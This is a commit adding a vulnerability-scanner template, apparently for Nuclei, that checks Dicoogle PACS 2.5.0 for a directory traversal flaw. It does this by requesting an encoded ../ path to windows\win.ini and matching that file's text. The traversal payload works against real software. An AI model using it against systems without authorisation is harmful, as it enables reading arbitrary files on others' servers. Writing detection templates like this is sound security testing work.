Create dicoogle-pacs-lfi.yaml

2021-12-24 08:57:26 +09:00 · 2021-12-24 08:57:26 +09:00 · 439a1e966a
parent eb325ed007
commit 439a1e966a
1 changed files with 24 additions and 0 deletions
--- a/dicoogle-pacs-lfi.yaml
+++ b/dicoogle-pacs-lfi.yaml
@ -0,0 +1,24 @@
+id: dicoogle-pacs-lfi
+
+info:
+  name: Dicoogle PACS 2.5.0 - Directory Traversal
+  author: 0x_akoko
+  severity: high
+  description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
+  reference: https://cxsecurity.com/issue/WLB-2018070131
+  tags: windows,lfi,dicoogle
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+        part: body